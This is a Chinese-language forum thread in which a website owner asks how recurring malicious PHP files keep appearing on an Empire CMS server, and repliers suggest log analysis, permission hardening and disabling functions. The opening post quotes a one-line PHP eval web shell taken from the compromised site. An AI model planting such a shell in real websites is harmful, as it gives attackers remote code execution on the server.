网站隔几天就会在 web 的一些目录下生成垃圾.php 的脚本文件。比如最近的一个 php 文件:
< php ? php @ eval ( $_POST [ 'cmd ']) ; ? >
只有这么一句话的恶意脚本。
我的服务器在阿里云,也买了安骑士杀毒,但是只能检测到恶意脚本,并隔离,但具体这些脚本怎么生成的无法得知,因为隔离了,几天后又有新的垃圾脚本生成。也就是我的 linux 系统里是不是有后门,怎么揪出来? 还请各位服务器大神给点建议,指点迷津。
1
yu1u 2017-06-29 18:13:15 +08:00 via iPhone
一般都是网站存在漏洞
|
2
liyvhg 2017-06-29 18:14:38 +08:00 via Android
检查所有 UGC,特别是能上传文件的地方
|
4
vus520 2017-06-29 18:17:00 +08:00 2
很简单
1,可写的目录,不给执行和访问权限 2,代码做版本管理,一行命令列出来新增和修改的问题,批量清除 |
5
mysticzt123 2017-06-29 18:18:31 +08:00
网站肯定有漏洞 建议升级
|
6
0x8C 2017-06-29 18:20:13 +08:00
坠简单的方法,重装系统
|
7
ningcool OP @vus520 1,可写的目录,不给执行和访问权限 (是不是我自己的程序 也没有可写的权限了?)
2,代码做版本管理,一行命令列出来新增和修改的问题,批量清除 (我觉得我 web 代码没有被修改,应该是 linux 系统被植入后门了) |
8
ningcool OP 网站帝国 CMS 系统,业界公认的很安全。我知道肯定是哪里有问题了,我现在想知道 怎么查找到问题点。
|
9
jarlyyn 2017-06-29 18:23:41 +08:00
帝国 CMS 系统,业界公认的很安全
………… 啥业界? |
12
jarlyyn 2017-06-29 18:40:27 +08:00
@ningcool
开源 cms 业界都快 wordpress 一家独大了,还会去公认帝国 cms 么? 看来我孤陋寡闻了…… 还有最好还是尽量少觉得。 从一楼开始都在和你说是网站问题。 很简单,如果 linux 系统被植入后门了,还需 evel 去执行 php 代码吗…… 会放一个 eval 脚本的,最高级也就是 ftp 密码被泄漏了吧…… |
13
Light3 2017-06-29 18:42:18 +08:00
帝国早 GG 了兄弟..
推荐你看看权限 除了穿图的目录 其余的都别给权限 |
14
Patrick95 2017-06-29 18:43:09 +08:00
被挂一句话木马八成是网站 /CMS 有上传漏洞。
|
15
rootx 2017-06-29 18:43:37 +08:00 via iPhone
帝国 CMS 确实业界公认最安全…白帽子界。
|
16
ningcool OP @jarlyyn 谢谢点播,不过 cms 中确实是帝国 CMS 最安全,wordpress 虽然流行,虽然独大, 但是安全性不如帝国吧。
|
17
LioMore 2017-06-29 18:47:22 +08:00
楼主说的业界早就不属于这个时代了
|
20
jarlyyn 2017-06-29 18:53:11 +08:00
|
21
484A4B 2017-06-29 19:09:57 +08:00
记录一下 HTTP 请求的内容,然后分析一下日志就知道了
|
22
ningcool OP @jarlyyn 啊! 我居然忘记看生成文件的用户了 ,没注意 www 还是 apache,还是 root,就给我删了。。
|
23
jarlyyn 2017-06-29 19:13:27 +08:00
@ningcool
另外一个简单的处理方法,不能根治,但能简单的起点防护作用。 你需要禁止 index.php 或者其他你需要的 php 之外的 php 文件的访问。 在 apache 或者 nginx 配置文件里把其他 php 文件的访问都 deny 掉,能防止简单的木马文件被执行。 |
24
crab 2017-06-29 19:15:46 +08:00
最简单的是去 web 日志搜索这个文件名,然后看前一个时间这个 IP 的日志都访问了啥,大概知道用什么方法进来了
|
25
husky 2017-06-29 19:18:26 +08:00
看楼主意思,不止 1 个?那是被日穿了啊
除了上面说的文件权限,php 开安全模式,disable_functions 设置下,危险的函数都禁掉,装插件把 eval 禁掉 还有代码里各种上传点,有没有做类型检查,有没有写文件的点等等等等…… |
26
jianzhiyao020 2017-06-29 19:20:17 +08:00
|
27
we3613040 2017-06-29 19:25:31 +08:00
一些目录下生成。。。。这个,查询服务器的访问日志,看看能不能找到蛛丝马迹
|
28
changwei 2017-06-29 19:36:28 +08:00
装个安全狗或者 360 主机卫士把,然后检查一下所有可能上传文件的地方看看是不是有什么上传漏洞
|
29
test99 2017-06-29 19:42:54 +08:00 via Android 4
都散了吧,楼主对帝国 cms 有盲目自信,这么安全怎么可能会被挂马呢,肯定是幻觉,都散了吧
|
30
springmarker 2017-06-29 19:56:31 +08:00
小白问一下,linux 上 web 开放了上传了文件的功能,怎么会被攻击,文件能自动执行?
|
32
zachlhb 2017-06-29 20:33:36 +08:00 via Android
现在的 CMS 就没有安全的,要认真做站,还是自己开发吧
|
33
ic3z 2017-06-29 21:04:34 +08:00 via Android
要不 access.log 日志发下?
|
34
realpg 2017-06-29 21:20:21 +08:00 2
不是自己写的程序,谁敢保证安全
还特么业界……都是吹出来的业界吧 |
35
Tonyski 2017-06-29 21:58:29 +08:00 2
上一次听说帝国这个东西貌似是五年前
|
36
ijimmy 2017-06-29 22:09:31 +08:00 via iPhone 2
不要随便就把业界代表了吧
|
37
40huo 2017-06-29 22:13:53 +08:00
@springmarker #30 可以找文件包含的地方,也可以尝试解析漏洞。
|
38
bfbd 2017-06-29 22:27:35 +08:00
把网站部署到 Docker 里,只绑定一个端口到服务器。Wordpress 的话,mysql 也可以放进去。
|
39
Hucai 2017-06-29 22:30:37 +08:00
扫描下是否有 webshell,有的话,服务器做安全没什么用
|
40
meowu 2017-06-29 22:40:30 +08:00
..手残去 Google 了一下~最安全的~"帝国 CMS"
....我是穿越回了小时候吗?! 这官网怎么有股"天空软件站"的味道。。。 .....这东西最后一次更新是 2015 年阿~ 2015 年阿~ 2015 年阿~ 2015 年阿~ |
41
joeke 2017-06-29 23:17:40 +08:00 via iPhone 1
帝国系统很傻逼好吗,漏洞很多的,挂木马的话,最好重装系统
|
42
lan894734188 2017-06-30 01:21:50 +08:00 via Android
对用户负责点吧 请个运维很难?
|
43
nVic 2017-06-30 01:57:00 +08:00 via iPhone
带哥,花钱买 windows server 吧,linux 真的没意思。。cms 就用 wordpress 吧,没毛病。
|
44
Silicon 2017-06-30 02:00:45 +08:00 1
帝国 CMS 安全?
哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈 检查下 cron.d |
45
WytheHuang 2017-06-30 09:04:09 +08:00 1
帝国 CMS 业界安全???想笑了~
|
46
aitaii 2017-06-30 09:36:00 +08:00 1
回到了清朝
|
47
cevincheung 2017-06-30 09:41:00 +08:00
对帝国蜜汁自信…… 23333
|
51
ajan 2017-06-30 10:05:04 +08:00
写个程序 遍历全部文件,并查找 特殊关键字
|
53
jason19659 2017-06-30 10:09:44 +08:00
业界最安全 6666666
|
55
8355 2017-06-30 10:16:54 +08:00
我用帝国 cms 的时候好像还是 2012 年.已经不是这个时代的产品了.
|
56
AlisaDestiny 2017-06-30 10:19:29 +08:00
http://www.phome.net/
这个网站? |
57
azoon 2017-06-30 10:27:05 +08:00
网站有上传漏洞,帝国 CMS 已经不是这个时代的产物了。如果楼主继续用帝国建议换到 Windows server。你应该不太适合用 Linux,用 Windows 你还能傻瓜式用些软件去查下漏洞,Windows server 性能不差。
|
58
ningcool OP @AlisaDestiny 哈哈哈 是的!
|
59
tempdban 2017-06-30 10:30:11 +08:00
@ningcool 做 cache,再不行直接全静态,腾讯 n 多博客都是 wordpress,要是性能有大问题早就弃用了。
|
60
wooyuntest 2017-06-30 11:12:44 +08:00
![1]( https://ooo.0o0.ooo/2017/06/30/5955c0ae9aa0d.png "1")
|
61
H3x 2017-06-30 11:14:58 +08:00
|
63
ningcool OP @wooyuntest 具体怎么拿到 shell 的?
|
64
zooandzoo 2017-06-30 11:18:53 +08:00
开先看文件修改时间,再看服务器访问日志,在日志里搜索相关文件名看它是怎么执行的,帝国 CMS 在国产 CMS 里算是比较安全的,虽然说现在不更新了。
|
65
bravecarrot 2017-06-30 11:23:37 +08:00 via iPhone
同 33 楼 发出访问日志 木马文件生成日期前后的部分
这种 cms 漏洞一大堆 一般是: 看 cms 版本,查漏洞,有漏洞,over ;没漏洞,下载来源代码,自己挖。要是没什么深仇大恨,没人会闲着没事挖你程序的漏洞 |
66
msg7086 2017-06-30 12:22:47 +08:00
楼上也别瞎推荐 Windows Server 了。连 Linux 都搞不定,你让他去搞 Windows ?
|
67
LioMore 2017-06-30 12:24:02 +08:00 via iPhone
帝国 CMS 让我联想到国内那些屎一样的程序和程序员
|
68
coolypf 2017-06-30 12:47:54 +08:00 1
lz 有点顽固啊,听不进大家的意见。
|
71
ryannnnn 2017-06-30 13:41:15 +08:00
日志放着干什么吃的,看看文件生成时间附近的日志
|
72
ym1ng 2017-06-30 13:50:46 +08:00
看了一下楼主主页 好像是 360 的 这个时候不是应该去找信息安全部和安服的大佬聊一聊看看这个帝国 cms 到底有多少漏洞吗?(逃
|
73
surfire91 2017-06-30 13:55:21 +08:00
楼主能不能把贵站地址报出来
|
75
anyclue 2017-06-30 15:13:07 +08:00
我怎么感觉楼上一堆傻逼,楼主你 ecms 用的什么版本的?还有各位为什么不可能是 Linux 服务器的问题呢?
|
77
yghack 2017-06-30 15:15:28 +08:00
先看一下开放的端口
是不是有 redis mysql 是不是有弱密码 再看看进程和计划任务 |
78
jarlyyn 2017-06-30 15:16:51 +08:00 2
|
79
surfire91 2017-06-30 15:24:37 +08:00
|
80
yw9381 2017-06-30 15:26:42 +08:00
@ningcool 帝国 cms 也就国内用的多,出了国门基本没人用,wordpress 已经是世界第一大开源 cms 了,举个最简单的例子,wordpress 自身的漏洞是可以拿到 CVE 编号的,帝国的漏洞不可能拿到,原因就是影响力,你的眼界只局限在国内站长圈子当然觉得帝国好了,在我们这些做安全的人眼里,帝国和 wordpress 不是一个量级上的东西,不可相提并论。
对于漏洞,个人觉得应该是帝国自身或是插件的问题导致被上了 shell,漏洞不修补,这些 shell 也就是发几个 http 包的事情,我个人觉得,服务器有没有被提权先不表,肯定是有一个守护式进程一样的东西,要么在你服务器里面(类似于定时任务自动写入),要么在对方攻击机(对方定时过来发个包)那边,建议先自查 http 日志,看下什么时候谁访问了这个 php shell,记录 IP,给 ban 掉,日志的上下文有没有其他看起来比较可疑的访问请求,跟着访问一次,模拟一下当时的过程,如果有的话最好抓包,有流量就可以复现攻击过程,一点一点查,总会找到源头的 |
82
Damaidaner 2017-06-30 15:32:22 +08:00
还好用的是 wordpress
|
84
jarlyyn 2017-06-30 15:42:50 +08:00 1
|
85
henices 2017-06-30 16:02:43 +08:00
注意查看 日志文件
last /var/log/* |
86
Dzer0 2017-06-30 16:59:19 +08:00
1、数据库更改账户密码
2、系统更改账户密码 3、尽量更改下远程登陆账户密码 linux 启动证书登陆 4、针对程序进行漏洞修复。 如果不知道怎么修复 1、查看程序是什么写的,然后更新成最新版 2、启用网站访问日志、观察是从哪里上传上来的 服务器安全性配置 参考 26 楼的 url |
87
birds7 2017-06-30 17:24:38 +08:00
看日志,先确定这个人怎么进来的,然后在考虑怎么修复!
|
91
hack 2017-06-30 18:22:03 +08:00 2
帝国 cms 0day 漫天飞
|
92
xencdn 2017-06-30 18:56:56 +08:00
php.ini 中禁用 exec 等指令即可
但是这个治标不治本 关键要找出注入点 |
93
winglight2016 2017-06-30 22:23:35 +08:00
@husky 被日穿了啊——看到这里一种老家的家乡话气息扑面而来,应该也是北方的吧
|
96
qfdk 2017-07-01 00:57:36 +08:00 via iPhone
l z 把站发上来吧 说不定有小伙伴可以帮你重现
|
97
Admstor 2017-07-01 01:54:08 +08:00 2
运维人员来给你几个建议
国内 CMS 基本上都是漏洞百出,为啥呢,因为都是各种中小站用的多,还有各种小软件商,揽了活就用现成的改改去掉 copyright 就糊弄了 那自然研究攻击的人也多. 加上水平确实比较低,所谓的维护绝对不会有架构上的变动,都是一层盖一层的打补丁,在我看来是挺"丑"和粗糙的 作为 IDC 运维我其实很不喜欢这样的客户,非常加重我们运维负担 国内的 IDC 商的主机,也是常年不更新,大部分还是 PHP 5.4/5.5,甚至一些还是 5.2 也倒是"相辅相成" 所以这一块市场其实很大,v2 的大佬一向轮子都要自己造,肯定看不上"草根"这些了 下面具体分析 首先生成 php 脚本,的确不太可能是从系统入手的攻击,因为拿到你的肉鸡,对于大部分攻击者来说,主要用途就是 2 个,第一个变成他可以控制的代理,作为跳板来去控制更多,以及直接利用你的发动 DDOS,大部分都是批量攻击,手法也粗糙,随便系统日志看看,或者你的 IDC 商也会警告你的网络流量异常,你没提到这个,说明至少暂时没有用. 那么第二个用途就是把你的网站插入各种推广,小尾巴之类,这样你花掉推广的钱和力气,他都可以渔翁得利 我猜你一开始也是发现自己页面变了,被插入各种垃圾广告,甚至网站都被百度 360 腾讯列为不安全网站才发现异常了 这基本就是证明了从你网站入手的,同样的都是批量扫描入侵 安骑士的介绍稍微看了下,感觉还是侧重于服务器防入侵类,并且也仅仅是提示你打补丁,以及事后日志分析,这 2 点说实在的,都是运维工程师基本水平 一般我是推荐客户,尤其是 windows 客户使用安全狗,服务器安全狗+网站安全狗 虽然也手法也挺粗糙,不过基本上常见的一些漏洞不太需要操心,大不了每天扫一遍也可以把生成的垃圾清除掉 网站安全狗是作为 IIS 的插件生效,可以直接进行拦截一些危险操作,基本的核心思想是危险的参数禁掉,不需要写的目录禁掉,常见的注入禁掉,总的来说我觉得,在无法修改源代码的情况下,差不多也就只能这么做了 linux 下的安全钩我没用过,毕竟 linux 服务器基本都是自己维护了,不太需要这些 楼上一些朋友推荐了你改用 windows 服务器我也比较赞同的 默认配置下,你不要乱看所谓的优化文章,其实 win 的安全性并不算差,至少我没有发现和 linux 有天地之差 但是会有更多入门安全软件支撑,更容易操作的界面,至少更新系统你会比较熟悉,出了问题也容易搜索到中文信息 不过总的来说...还是尽量提高自己的姿势水平 |
98
Admstor 2017-07-01 02:03:43 +08:00 2
另外说 WP 性能不好...其实倒也没说错
最近我也没怎么碰 WP 所以说的可能有点落后 WP 原生是没有所谓生成静态页面的 而国内 CMS 这点基本标配,基本上后台都有一个所谓生成页面之类的选项,生成完了就是一大堆 html,纯浏览当然超快的 但是一遇到交互的很可能就傻逼了 另外就是一大堆 js 是用的国外源,需要自己改回国内的,国内都喜欢 include 自己本地,当然也快啦 另外就是自由度,国内 CMS 你改来改去都会发现,不一样的包装还是一样的味道... 自由度其实很低的...框架基本都是死的...代码也是各种粗暴实现... 其实 WP 好好优化一下,速度并不慢(不过还是相对于其他的慢一些,但绝对是可以接受的,如果接受不了,说明你的 PV 早就足够你请人开发了,还用什么 WP) |
99
ihciah 2017-07-01 06:21:24 +08:00 via iPhone
第一次听说帝国 CMS 似乎是在 ctf 赛棍圈子里……🌝还有 dedeCMS
|
100
hjlmjx 2017-07-01 09:05:30 +08:00 via Android 1
楼主这心态,有漏洞不管帝国的事情。
|